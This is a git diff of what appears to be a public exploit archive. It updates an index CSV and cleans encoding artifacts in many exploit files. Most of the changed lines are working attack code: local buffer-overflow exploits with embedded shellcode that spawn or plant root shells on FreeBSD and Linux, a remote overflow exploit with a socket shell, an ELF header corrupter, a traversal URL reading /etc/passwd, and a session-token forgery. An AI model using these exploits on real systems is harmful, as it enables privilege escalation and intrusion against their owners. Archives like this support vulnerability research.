diff --git a/files.csv b/files.csv index c9421cdfc..7520955d4 100755 --- a/files.csv +++ b/files.csv @@ -33336,7 +33336,7 @@ id,file,description,date,author,platform,type,port 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 -36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 +36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0 @@ -35895,3 +35895,6 @@ id,file,description,date,author,platform,type,port 39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443 39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0 +39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0 +39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0 +39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443 diff --git a/platforms/cgi/webapps/21558.txt b/platforms/cgi/webapps/21558.txt index d68a0bd89..8ddd8b10d 100755 --- a/platforms/cgi/webapps/21558.txt +++ b/platforms/cgi/webapps/21558.txt @@ -4,4 +4,4 @@ My Postcards is a commercial available eletronic postcard system. It is availabl The magiccard.cgi script does not properly handle some types of input. As a result, it may be possible for a remote user to specify the location of a specific file on the system hosting the My Postcards software. Upon specifying the location of a file that is readable by the web server process, the user could disclose the contents of the specified file. -http://www.example.com/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/freebsd/local/19649.c b/platforms/freebsd/local/19649.c index 273c6d53c..7e8bd37aa 100755 --- a/platforms/freebsd/local/19649.c +++ b/platforms/freebsd/local/19649.c @@ -4,7 +4,7 @@ There is a buffer overflow vulnerability known to be present in the version of g /* - * gdc exploit for Freebsd-3.3 yields euid=3D0(root) + * gdc exploit for Freebsd-3.3 yields euid=0(root) * by default, only group wheel (or whatever your trusted gated group is)= * and root can run gdc diff --git a/platforms/freebsd/local/19676.c b/platforms/freebsd/local/19676.c index 3904a5057..cde486107 100755 --- a/platforms/freebsd/local/19676.c +++ b/platforms/freebsd/local/19676.c @@ -6,71 +6,65 @@ The binary itself is subject to a buffer overflow attack (which may be launched The user does not have to have a valid $DISPLAY to exploit this. -/* = - - * xsoldier exploit for Freebsd-3.3-RELEASE - * Drops a suid root shell in /bin/sh - * Brock Tellier btellier@usa.net - */ +/* +* xsoldier exploit for Freebsd-3.3-RELEASE +* Drops a suid root shell in /bin/sh +* Brock Tellier btellier@usa.net +*/ #include -char shell[]=3D /* mudge@l0pht.com */ - "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" - "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" - "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" - "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; +char shell[]= /* mudge@l0pht.com */ + "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" + "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" + "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" + "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; - char cc[100]; - fp =3D fopen("/tmp/ui.c", "w"); - fprintf(fp, CODE); - fclose(fp); - snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); - system(cc); + char cc[100]; + fp = fopen("/tmp/ui.c", "w"); + fprintf(fp, CODE); + fclose(fp); + snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); + system(cc); } main (int argc, char *argv[] ) { - int x =3D 0; - int y =3D 0; - int offset =3D 0; - int bsize =3D 4400; - char buf[bsize]; - int eip =3D 0xbfbfdb65; /* works for me */ - buildui(); +int x = 0; +int y = 0; +int offset = 0; +int bsize = 4400; +char buf[bsize]; +int eip = 0xbfbfdb65; /* works for me */ +buildui(); - if (argv[1]) { = - - offset =3D atoi(argv[1]); - eip =3D eip + offset; - } - fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE +if (argv[1]) { + offset = atoi(argv[1]); + eip = eip + offset; +} +fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE \n"); - fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); - fprintf(stderr, "eip=3D0x%x offset=3D%d buflen=3D%d\n", eip, offset, bsi= -ze); - = +fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); +fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); - for ( x =3D 0; x < 4325; x++) buf[x] =3D 0x90; - fprintf(stderr, "NOPs to %d\n", x); - = +for ( x = 0; x < 4325; x++) buf[x] = 0x90; + fprintf(stderr, "NOPs to %d\n", x); - for ( y =3D 0; y < 67 ; x++, y++) buf[x] =3D shell[y]; - fprintf(stderr, "Shellcode to %d\n",x); - = +for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; + fprintf(stderr, "Shellcode to %d\n",x); + + buf[x++] = eip & 0x000000ff; + buf[x++] = (eip & 0x0000ff00) >> 8; + buf[x++] = (eip & 0x00ff0000) >> 16; + buf[x++] = (eip & 0xff000000) >> 24; + fprintf(stderr, "eip to %d\n",x); - buf[x++] =3D eip & 0x000000ff; - buf[x++] =3D (eip & 0x0000ff00) >> 8; - buf[x++] =3D (eip & 0x00ff0000) >> 16; - buf[x++] =3D (eip & 0xff000000) >> 24; - fprintf(stderr, "eip to %d\n",x); - - buf[bsize]=3D'\0'; +buf[bsize]='\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); -} +} \ No newline at end of file diff --git a/platforms/hardware/remote/17507.py b/platforms/hardware/remote/17507.py index 3d6f541da..af08b7cf4 100755 --- a/platforms/hardware/remote/17507.py +++ b/platforms/hardware/remote/17507.py @@ -1,4 +1,103 @@ #!/usr/bin/python + +############################################################################### +# +#Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability +#Author : Veerendra G.G from SecPod Technologies (www.secpod.com) +#Vendor : http://www.avaya.com/usa/product/ip-office +#Advisory : http://www.avaya.com/usa/product/ip-office +# http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap +# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py +# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +#Version : Avaya IP Office Manager TFTP Server Version 8.1 +#Date : 08/07/2011 +# +################################################################################ +# +#SecPod ID: 1017 25/05/2011 Issue Discovered +# 31/05/2011 Vendor Notified +# No Response from the Vendor +# 08/07/2011 Advisory Released +# +# +#Class: Information Disclosure Severity: Medium +# +# +#Overview: +#--------- +#Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory +#Traversal vulnerability. +# +# +#Technical Description: +#---------------------- +#The vulnerability is caused due to improper validation to Read Request +#Parameter containing '../' sequences, which allows attackers to read +#arbitrary files via directory traversal attacks. +# +# +#Impact: +#-------- +#Successful exploitation could allow an attacker to to obtain sensitive +#information, which can lead to launching further attacks. +# +# +#Affected Software: +#------------------ +#Avaya IP Office Manager TFTP Server Version 8.1 +# +# +#Tested on: +#----------- +#Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3. +# +# +#References: +#----------- +#http://secpod.org/blog/?p=225 +#http://www.avaya.com/usa/product/ip-office +#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap +#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py +#http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +# +# +#Proof of Concept: +#---------------- +#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py +#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap +# +# +#Solution: +#---------- +#Not available +# +# +#Risk Factor: +#------------- +# CVSS Score Report: +# ACCESS_VECTOR = NETWORK +# ACCESS_COMPLEXITY = LOW +# AUTHENTICATION = NOT_REQUIRED +# CONFIDENTIALITY_IMPACT = PARTIAL +# INTEGRITY_IMPACT = NONE +# AVAILABILITY_IMPACT = NONE +# EXPLOITABILITY = PROOF_OF_CONCEPT +# REMEDIATION_LEVEL = UNAVAILABLE +# REPORT_CONFIDENCE = CONFIRMED +# CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) +# CVSS Temporal Score = 4.5 +# Risk factor = Medium +# +# +#Credits: +#-------- +#Veerendra G.G of SecPod Technologies has been credited with the discovery of +#this vulnerability. +# +# +#SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py: +# + ############################################################################## # Exploit : http://secpod.com/blog/?p=225 # http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py diff --git a/platforms/hardware/webapps/23250.txt b/platforms/hardware/webapps/23250.txt index 4de0fb724..7870f94bc 100755 --- a/platforms/hardware/webapps/23250.txt +++ b/platforms/hardware/webapps/23250.txt @@ -35,27 +35,27 @@ Length: unspecified [application/octet-stream Content-transfer-encoding: bi= nary] Saving to: =E2=80=9Cfilename.gwc=E2=80=9D - [ <=3D> ] 15,= + [ <=> ] 15,= 927 50.9K/s in 0.3s =20 2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159= 27] $ head -n 10 filename.gwc=20 -CRCVALUE=3D4144540802; +CRCVALUE=4144540802; #<> -Version=3D1.1; -Created Date=3D2012/12/8; -Created Time=3D21:24:43; -Model Number=3DDPC2420; -Serial Number=3D234905123; -User Password=3Dky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw= +Version=1.1; +Created Date=2012/12/8; +Created Time=21:24:43; +Model Number=DPC2420; +Serial Number=234905123; +User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw= l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR 7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL= Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V= ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6 -3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg=3D=3D; +3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==; [---OUTPUT OMITTED FOR SPACE REASONS---] [0x02]> - Persistent XSS @@ -94,12 +94,12 @@ lain text easily.=20 0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/ 0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application 0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli - 0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=3D0.= + 0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=0.= 9 - 0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=3D0.8..Acc= + 0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=0.8..Acc= e 0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en- - 0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=3D0.5..Ac= + 0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=0.5..Ac= c 0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz 0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con @@ -109,13 +109,13 @@ c 0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A 0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba 0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3 - 0x01a0: 1b4e 1134 640a 054b ZAo=3D=3D.... + 0x01a0: 1b4e 1134 640a 054b ZAo==.... - From 0x0180 offset to the end of the packet payload the attacker could ge= t the password=20 encoded with Base64 and simply convert it to plain text: -$ echo aWFtYXBhc3N3ZAo=3D=3D | base64 -d +$ echo aWFtYXBhc3N3ZAo== | base64 -d iamapassword - --- @@ -136,5 +136,5 @@ zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9 s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G E7C4vqJfmBNShPTbtb67 -=3DEzto +=Ezto -----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/linux/dos/22370.txt b/platforms/linux/dos/22370.txt index a233d3b5b..ad94b261d 100755 --- a/platforms/linux/dos/22370.txt +++ b/platforms/linux/dos/22370.txt @@ -8,14 +8,14 @@ From xxx@corest.com Wed Mar 5 14:06:02 2003 Subject: xxx From: X X. X To: xxx@corest.com -Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y" +Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" Message-Id: <1046884154.1731.5.camel@vaiolin> Mime-Version: 1.0 Date: 05 Mar 2003 14:09:14 -0300 ---=3D-mTDu5zdJIsixETTwCF5Y -Content-Disposition: inline; filename=3Dname -Content-Type: application/octet-stream; name=3Dname +--=-mTDu5zdJIsixETTwCF5Y +Content-Disposition: inline; filename=name +Content-Type: application/octet-stream; name=name Content-Transfer-Encoding: 7bit begin 600 phase2 @@ -27,4 +27,4 @@ M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A- ?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@ end ---=3D-mTDu5zdJIsixETTwCF5Y-- \ No newline at end of file +--=-mTDu5zdJIsixETTwCF5Y-- \ No newline at end of file diff --git a/platforms/linux/local/19384.c b/platforms/linux/local/19384.c index 7333cef40..c1c8ab522 100755 --- a/platforms/linux/local/19384.c +++ b/platforms/linux/local/19384.c @@ -30,89 +30,89 @@ The LPRng software is an enhanced, extended, and portable version of the Berkele int main(int argc, char **argv) { - int sock; - struct sockaddr_in dest_sin; - struct sockaddr_in src_sin; - struct hostent *hp; - unsigned long ipnum; - char line[256]; - int mode =3D 0; + int sock; + struct sockaddr_in dest_sin; + struct sockaddr_in src_sin; + struct hostent *hp; + unsigned long ipnum; + char line[256]; + int mode = 0; - if (argc < 2) - { - fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); - exit(EXIT_FAILURE); - } + if (argc < 2) + { + fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); + exit(EXIT_FAILURE); + } - if (argc >=3D 3) - { - if (!strcmp(argv[2], "start")) - mode =3D 1; - else if (strcmp(argv[2], "stop")) - { - fprintf(stderr, "Invalid mode. Use stop or start.\n"); - fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); - exit(EXIT_FAILURE); - } - } - =09 - snprintf(line, sizeof(line), "%c%s root %s %s\n",=20 - 6, argv[1], (mode)? "start":"stop", argv[1]); + if (argc >= 3) + { + if (!strcmp(argv[2], "start")) + mode = 1; + else if (strcmp(argv[2], "stop")) + { + fprintf(stderr, "Invalid mode. Use stop or start.\n"); + fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); + exit(EXIT_FAILURE); + } + } + =09 + snprintf(line, sizeof(line), "%c%s root %s %s\n",=20 + 6, argv[1], (mode)? "start":"stop", argv[1]); - memset(&dest_sin, 0, sizeof(struct sockaddr_in)); - dest_sin.sin_port =3D htons((short) DST_PORT); + memset(&dest_sin, 0, sizeof(struct sockaddr_in)); + dest_sin.sin_port = htons((short) DST_PORT); - ipnum =3D (unsigned long) inet_addr(HOST); - if (ipnum !=3D ((unsigned long) INADDR_NONE)) - { - dest_sin.sin_family =3D AF_INET; - dest_sin.sin_addr.s_addr =3D ipnum; - } - else - { - if ((hp =3D gethostbyname(HOST)) =3D=3D NULL) - { - fprintf(stderr, "Host lookup failed.\n"); - exit(EXIT_FAILURE); - } + ipnum = (unsigned long) inet_addr(HOST); + if (ipnum != ((unsigned long) INADDR_NONE)) + { + dest_sin.sin_family = AF_INET; + dest_sin.sin_addr.s_addr = ipnum; + } + else + { + if ((hp = gethostbyname(HOST)) == NULL) + { + fprintf(stderr, "Host lookup failed.\n"); + exit(EXIT_FAILURE); + } - dest_sin.sin_family =3D hp->h_addrtype; - memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0], - (size_t)hp->h_length); - } + dest_sin.sin_family = hp->h_addrtype; + memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0], + (size_t)hp->h_length); + } - if ((sock =3D socket(AF_INET, SOCK_STREAM, 0)) < 0) - { - perror("Socket call failed"); - exit(EXIT_FAILURE); - } + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) + { + perror("Socket call failed"); + exit(EXIT_FAILURE); + } - src_sin.sin_family =3D AF_INET; - src_sin.sin_addr.s_addr =3D INADDR_ANY; - src_sin.sin_port =3D htons((u_short) SRC_PORT); + src_sin.sin_family = AF_INET; + src_sin.sin_addr.s_addr = INADDR_ANY; + src_sin.sin_port = htons((u_short) SRC_PORT); - if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0) - { - perror("Bind failed"); - exit(EXIT_FAILURE); - } + if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0) + { + perror("Bind failed"); + exit(EXIT_FAILURE); + } - if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0) - { - close(sock); - perror("Connect failed"); - exit(EXIT_FAILURE); - } + if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0) + { + close(sock); + perror("Connect failed"); + exit(EXIT_FAILURE); + } - if (write(sock, line, strlen(line)) <=3D 0) - { - perror("Write failed"); - exit(EXIT_FAILURE); - } + if (write(sock, line, strlen(line)) <= 0) + { + perror("Write failed"); + exit(EXIT_FAILURE); + } - close(sock); + close(sock); - return EXIT_SUCCESS; + return EXIT_SUCCESS; } ---- stop lpcontrol.c ----------------------------------------------- diff --git a/platforms/linux/local/19953.c b/platforms/linux/local/19953.c index b56357a0e..0ca3a26f5 100755 --- a/platforms/linux/local/19953.c +++ b/platforms/linux/local/19953.c @@ -51,7 +51,7 @@ box, // Gee, Aleph1 his shellcode is back once more -char shellcode[] =3D +char shellcode[] = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" @@ -63,16 +63,16 @@ unsigned long get_sp(void) { main(int argc, char **argv) { - int buf_size =3D 71; - int offset=3D0, i; + int buf_size = 71; + int offset=0, i; char *overflow; char *ovoff; - long addr, ptr=3D0x0804c7d0; + long addr, ptr=0x0804c7d0; - if(argc>1) offset =3D atoi(argv[1]); - if(argc>2) buf_size =3D atoi(argv[2]); - if(argc>3) ptr =3D strtol(argv[3], (char **) NULL, 16); + if(argc>1) offset = atoi(argv[1]); + if(argc>2) buf_size = atoi(argv[2]); + if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16); printf("##############################################\n"); printf("# fdmount Slack 4/7 exploit - by Scrippie #\n"); @@ -82,19 +82,19 @@ main(int argc, char **argv) printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", = ptr); - if(!(overflow =3D (char = + if(!(overflow = (char = *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) { fprintf(stderr, "Outta memory - barging out\n"); exit(-1); } - overflow[0] =3D '/'; + overflow[0] = '/'; - for(i=3D1;i #include -char *shell=3D +char *shell= "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17" "\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e" "\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89" @@ -32,7 +32,7 @@ char *shell=3D #define BUFLEN 1200 char buf[BUFLEN]; -int offset=3DOFFSET; +int offset=OFFSET; int nbytes; int sock; struct sockaddr_in sa; @@ -47,24 +47,24 @@ v2.1.4-R3\n"); exit(0); } if(argc>2) - offset=3Datoi(argv[2]); + offset=atoi(argv[2]); memset(buf,0x90,BUFLEN); memcpy(buf+800,shell,strlen(shell)); - for(i=3D901;ih_addr,hp->h_length); - if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) { + if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()"); exit(0); } @@ -77,17 +77,17 @@ fflush(stdout); FD_SET(0,&input); FD_SET(sock,&input); if((select(sock+1,&input,NULL,NULL,NULL))<0) { - if(errno=3D=3DEINTR) continue; + if(errno==EINTR) continue; printf("CONNECTION CLOSED...\n"); = fflush(stdout); exit(1); } if(FD_ISSET(sock,&input)) { - nbytes=3Dread(sock,buf,BUFLEN); - for(i=3D0;i126) || (a<32)) ){ - buf[i]=3D' '; + nbytes=read(sock,buf,BUFLEN); + for(i=0;i126) || (a<32)) ){ + buf[i]=' '; } } write(1,buf,nbytes); diff --git a/platforms/multiple/dos/23524.c b/platforms/multiple/dos/23524.c index fdfee6d60..855ff52ba 100755 --- a/platforms/multiple/dos/23524.c +++ b/platforms/multiple/dos/23524.c @@ -34,8 +34,8 @@ nitr0us@burial:~$ gdb -q idaq Program received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 0xb6860760 (LWP 3638)] -0xb55f7694 in default_notification_handler (reader=3D@0xbfbffae0, - notif=3Dreader_t::err_shstrndx) at reader.cpp:33 +0xb55f7694 in default_notification_handler (reader=@0xbfbffae0, + notif=reader_t::err_shstrndx) at reader.cpp:33 33 reader.cpp: No such file or directory. in reader.cpp Current language: auto; currently c++ @@ -75,7 +75,7 @@ verify if e_shstrndx > e_shnum before referencing it. #define ELFCLASS32 1 /* 32-bit objects */ #define ELFDATA2LSB 1 /* 2's complement, little endian */ -const char e_magic[4] =3D { 0x7f, 'E', 'L', 'F' }; +const char e_magic[4] = { 0x7f, 'E', 'L', 'F' }; typedef uint16_t Elf32_Half; typedef uint32_t Elf32_Word; @@ -128,7 +128,7 @@ fprintf(stderr, "Usage: %s \n", argv[0]); exit(-1); } -if((fd =3D open(argv[1], O_RDWR)) =3D=3D -1){ +if((fd = open(argv[1], O_RDWR)) == -1){ perror("open"); exit(-1); } @@ -139,8 +139,8 @@ exit(-1); } // Mapping to memory only the necessary bytes [sizeof(header)] -if((header =3D (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO= -T_WRITE, MAP_SHARED, fd, 0)) =3D=3D MAP_FAILED){ +if((header = (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO= +T_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){ perror("mmap"); close(fd); exit(-1); @@ -156,17 +156,17 @@ printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]); srand(time(NULL)); // seed for rand() -new_shnum =3D (Elf32_Half) rand() % 0x1337; -new_shstrndx =3D (Elf32_Half) 0; +new_shnum = (Elf32_Half) rand() % 0x1337; +new_shstrndx = (Elf32_Half) 0; while(new_shstrndx < new_shnum) -new_shstrndx =3D (Elf32_Half) rand() % 0xDEAD; +new_shstrndx = (Elf32_Half) rand() % 0xDEAD; -header->e_shnum =3D new_shnum; -header->e_shstrndx =3D new_shstrndx; +header->e_shnum = new_shnum; +header->e_shstrndx = new_shstrndx; // Synchronize the ELF in file system with the previous memory mapped -if(msync(NULL, 0, MS_SYNC) =3D=3D -1){ +if(msync(NULL, 0, MS_SYNC) == -1){ perror("msync"); close(fd); exit(-1); @@ -189,25 +189,25 @@ int isELF(int fd) { Elf32_Ehdrheader; -if(read(fd, &header, sizeof(header)) =3D=3D -1){ +if(read(fd, &header, sizeof(header)) == -1){ perror("isELF(): read"); return 0; } /* magic number verification */ -if(memcmp(header.e_ident, e_magic, 4) !=3D 0){ +if(memcmp(header.e_ident, e_magic, 4) != 0){ fprintf(stderr, "The argument given is not an ELF file !\n"); return 0; } /* 32-bit class verification */ -if(header.e_ident[4] !=3D ELFCLASS32){ +if(header.e_ident[4] != ELFCLASS32){ fprintf(stderr, "Only 32-bit ELF files supported !\n"); return 0; } /* little-endian verification */ -if(header.e_ident[5] !=3D ELFDATA2LSB){ +if(header.e_ident[5] != ELFDATA2LSB){ fprintf(stderr, "Only little-endian ELF files supported !\n"); return 0; } diff --git a/platforms/multiple/webapps/24744.txt b/platforms/multiple/webapps/24744.txt index c7ec2ad38..b02c1023e 100755 --- a/platforms/multiple/webapps/24744.txt +++ b/platforms/multiple/webapps/24744.txt @@ -22,7 +22,7 @@ paths via Spring Security configuration or other means. Example: A request to: -/app/api/rpc/users/get?offset=3DOFFSET +/app/api/rpc/users/get?offset=OFFSET will return the following: diff --git a/platforms/multiple/webapps/31647.txt b/platforms/multiple/webapps/31647.txt index 7869f335d..a665ad074 100755 --- a/platforms/multiple/webapps/31647.txt +++ b/platforms/multiple/webapps/31647.txt @@ -12,13 +12,13 @@ Details: CA 2E Web Option (r8.1.2) and potentially others, is vulnerable to unauthenticated privilege escalation via a predictable session token. The POST parameter session token W2E_SSNID appears as follows: -W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE +W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE JuNX9GoVjCEbqIuKh6kFRvbzYnUxgQtONszJldyAar3LtTSwsmBLpdlPc5iDH4Zf75 However, this token is poorly validated, leading to -W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013 +W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013 being accepted as a valid session. By incrementing and decrementing the digits at the end of the value given above, it is @@ -27,7 +27,7 @@ part of the login page, and as such, can be manipulated by an unauthenticated attacker, giving them access to any valid session. Consequentially, it is possible to access the following page as such: -https://app.domain.co.uk/web2edoc/close.htm?SSNID=3DW90NIxGoSsN1023ZYW2E735182000026 +https://app.domain.co.uk/web2edoc/close.htm?SSNID=W90NIxGoSsN1023ZYW2E735182000026 Ending the session specified, which could lead to a denial of service condition. diff --git a/platforms/multiple/webapps/36930.txt b/platforms/multiple/webapps/36930.txt index 3148dd34c..950a8e3fb 100755 --- a/platforms/multiple/webapps/36930.txt +++ b/platforms/multiple/webapps/36930.txt @@ -3,7 +3,7 @@ # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ -# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 +# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps @@ -37,10 +37,10 @@ Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 